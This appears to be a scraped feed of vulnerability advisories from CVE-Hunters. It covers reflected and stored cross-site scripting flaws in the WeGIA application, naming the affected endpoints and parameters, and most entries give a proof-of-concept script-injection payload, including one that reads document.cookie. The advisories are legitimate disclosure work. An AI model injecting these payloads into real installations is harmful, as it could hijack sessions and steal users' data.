class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22618/402269277-bc3361ca-6e12-482a-a170-a94db8ed495e.png" width="853" height="364" srcset="/p/cve-2025-22618/402269277-bc3361ca-6e12-482a-a170-a94db8ed495e_hu_6a45ce3aa9ecb630.png 480w, /p/cve-2025-22618/402269277-bc3361ca-6e12-482a-a170-a94db8ed495e_hu_196ee94f0359f512.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="234" data-flex-basis="562px" /></p> <p><img src="/p/cve-2025-22618/402269279-a461d356-14f1-4517-be79-e9cd112fd6c1.png" width="805" height="222" srcset="/p/cve-2025-22618/402269279-a461d356-14f1-4517-be79-e9cd112fd6c1_hu_8639761381340b0.png 480w, /p/cve-2025-22618/402269279-a461d356-14f1-4517-be79-e9cd112fd6c1_hu_f8134686c8ad53cb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="362" data-flex-basis="870px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-2775-42rh-535q" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-2775-42rh-535q</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22619/ https://www.cvehunters.com/p/cve-2025-22619/ <h2 id="cve-2025-22619-cross-site-scripting-xss-reflected-endpoint-editar_permissoesphp-parameter-msg_c">CVE-2025-22619: Cross-Site Scripting (XSS) Reflected endpoint <code>editar_permissoes.php</code> parameter <code>msg_c</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22619" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22619</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>editar_permissoes.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_c</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/geral/editar_permissoes.php</code></p> <p>Parameter: <code>msg_c</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_c</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p><h2 id="cve-2025-22619-cross-site-scripting-xss-reflected-endpoint-editar_permissoesphp-parameter-msg_c">CVE-2025-22619: Cross-Site Scripting (XSS) Reflected endpoint <code>editar_permissoes.php</code> parameter <code>msg_c</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22619" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22619</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>editar_permissoes.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_c</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/geral/editar_permissoes.php</code></p> <p>Parameter: <code>msg_c</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_c</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22619/402269818-f31360e5-306f-426b-b4e5-8dc93352da38.png" width="893" height="303" srcset="/p/cve-2025-22619/402269818-f31360e5-306f-426b-b4e5-8dc93352da38_hu_ae5a85c73166190.png 480w, /p/cve-2025-22619/402269818-f31360e5-306f-426b-b4e5-8dc93352da38_hu_ec3cf89ab4cc1f18.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="294" data-flex-basis="707px" /></p> <p><img src="/p/cve-2025-22619/402269822-e17c5e3e-be98-417d-97fb-e5c5225e6fb1.png" width="803" height="249" srcset="/p/cve-2025-22619/402269822-e17c5e3e-be98-417d-97fb-e5c5225e6fb1_hu_94b8dcce06577ba2.png 480w, /p/cve-2025-22619/402269822-e17c5e3e-be98-417d-97fb-e5c5225e6fb1_hu_2a94092c56f27d46.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="322" data-flex-basis="773px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> Reflected cross-site scripting (XSS) attacks can have serious consequences, including: <ul> <li>User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.</li> <li>Data theft: Attackers can exfiltrate data or install malware on the user's machine.</li> <li>Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.</li> <li>Malicious code: Attackers can execute malicious code on the user's system.</li> <li>Business reputation damage: Attackers can deface a corporate website or spread misinformation.</li> <li>Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jfjj-7rgc-6j2m" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jfjj-7rgc-6j2m</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/code" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/code" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23030/ https://www.cvehunters.com/p/cve-2025-23030/ <h2 id="cve-2025-23030-cross-site-scripting-xss-reflected-endpoint-cadastro_funcionariophp-parameter-cpf">CVE-2025-23030: Cross-Site Scripting (XSS) Reflected endpoint <code>cadastro_funcionario.php</code> parameter <code>cpf</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23030" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23030</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastro_funcionario.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>cpf</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/funcionario/cadastro_funcionario.php</code></p> <p>Parameter: <code>cpf</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>cpf</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p><h2 id="cve-2025-23030-cross-site-scripting-xss-reflected-endpoint-cadastro_funcionariophp-parameter-cpf">CVE-2025-23030: Cross-Site Scripting (XSS) Reflected endpoint <code>cadastro_funcionario.php</code> parameter <code>cpf</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23030" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23030</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastro_funcionario.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>cpf</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/funcionario/cadastro_funcionario.php</code></p> <p>Parameter: <code>cpf</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>cpf</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23030/402271163-e2150dc6-457b-4bf6-99fc-69c9924a51fe.png" width="918" height="317" srcset="/p/cve-2025-23030/402271163-e2150dc6-457b-4bf6-99fc-69c9924a51fe_hu_c8e91ddf776d6051.png 480w, /p/cve-2025-23030/402271163-e2150dc6-457b-4bf6-99fc-69c9924a51fe_hu_101ae618a25ecc62.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="289" data-flex-basis="695px" /></p> <p><img src="/p/cve-2025-23030/402271164-d511ae4b-88e1-4198-943d-62a8f81fe823.png" width="806" height="233" srcset="/p/cve-2025-23030/402271164-d511ae4b-88e1-4198-943d-62a8f81fe823_hu_b90e40199c08726a.png 480w, /p/cve-2025-23030/402271164-d511ae4b-88e1-4198-943d-62a8f81fe823_hu_d1cbcefed7c53e69.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="345" data-flex-basis="830px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> Reflected cross-site scripting (XSS) attacks can have serious consequences, including: <ul> <li>User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.</li> <li>Data theft: Attackers can exfiltrate data or install malware on the user's machine.</li> <li>Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.</li> <li>Malicious code: Attackers can execute malicious code on the user's system.</li> <li>Business reputation damage: Attackers can deface a corporate website or spread misinformation.</li> <li>Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-88c9-gpgh-6vvrcode" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-88c9-gpgh-6vvrcode</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23031/ https://www.cvehunters.com/p/cve-2025-23031/ <h2 id="cve-2025-23031-cross-site-scripting-xss-stored-endpoint-adicionar_alergiaphp-parameter-nome">CVE-2025-23031: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_alergia.php</code> parameter <code>nome</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23031" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23031</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_alergia.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parametercode. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/saude/adicionar_alergia.php</code></p><h2 id="cve-2025-23031-cross-site-scripting-xss-stored-endpoint-adicionar_alergiaphp-parameter-nome">CVE-2025-23031: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_alergia.php</code> parameter <code>nome</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23031" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23031</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_alergia.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parametercode. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/saude/adicionar_alergia.php</code></p> <p>Parameter: <code>nome</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>adicionar_alergia.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23031/402278153-dc6daac0-ec0e-44e7-89cf-44071056103e.png" width="805" height="322" srcset="/p/cve-2025-23031/402278153-dc6daac0-ec0e-44e7-89cf-44071056103e_hu_b47fb1291cd2325a.png 480w, /p/cve-2025-23031/402278153-dc6daac0-ec0e-44e7-89cf-44071056103e_hu_2c4c51887bda5c54.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="250" data-flex-basis="600px" /></p> <p><img src="/p/cve-2025-23031/402278156-33fae2c0-653a-43bd-b4f8-7352e6297075.png" width="805" height="259" srcset="/p/cve-2025-23031/402278156-33fae2c0-653a-43bd-b4f8-7352e6297075_hu_11d348064d7422c4.png 480w, /p/cve-2025-23031/402278156-33fae2c0-653a-43bd-b4f8-7352e6297075_hu_afa5df58c4923029.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="310" data-flex-basis="745px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-wp4f-qhh2-8vfv" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-wp4f-qhh2-8vfv</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23032/ https://www.cvehunters.com/p/cve-2025-23032/ <h2 id="cve-2025-23032-cross-site-scripting-xss-stored-endpoint-adicionar_escalaphp-parameter-escala">CVE-2025-23032: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_escala.php</code> parameter <code>escala</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23032" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23032</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_escala.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>escala</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/quadro_horario/adicionar_escala.php</code></p><h2 id="cve-2025-23032-cross-site-scripting-xss-stored-endpoint-adicionar_escalaphp-parameter-escala">CVE-2025-23032: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_escala.php</code> parameter <code>escala</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23032" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23032</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_escala.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>escala</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/quadro_horario/adicionar_escala.php</code></p> <p>Parameter: <code>escala</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>adicionar_escala.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">top</span><span class="p">[</span><span class="mf">8680439.</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">30</span><span class="p">)](</span><span class="mi">1337</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23032/402366240-47f35978-fdb4-443a-adc1-0c43739d2d63.png" width="807" height="246" srcset="/p/cve-2025-23032/402366240-47f35978-fdb4-443a-adc1-0c43739d2d63_hu_e61f4aac413410da.png 480w, /p/cve-2025-23032/402366240-47f35978-fdb4-443a-adc1-0c43739d2d63_hu_79c3dad83f778fdc.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="328" data-flex-basis="787px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6mm4-fcfv-55x3code" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6mm4-fcfv-55x3code</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23033/ https://www.cvehunters.com/p/cve-2025-23033/ <h2 id="cve-2025-23033-cross-site-scripting-xss-stored-endpoint-adicionar_situacaophp-parameter-situacao">CVE-2025-23033: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_situacao.php</code> parameter <code>situacao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23033" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23033</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_situacao.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious 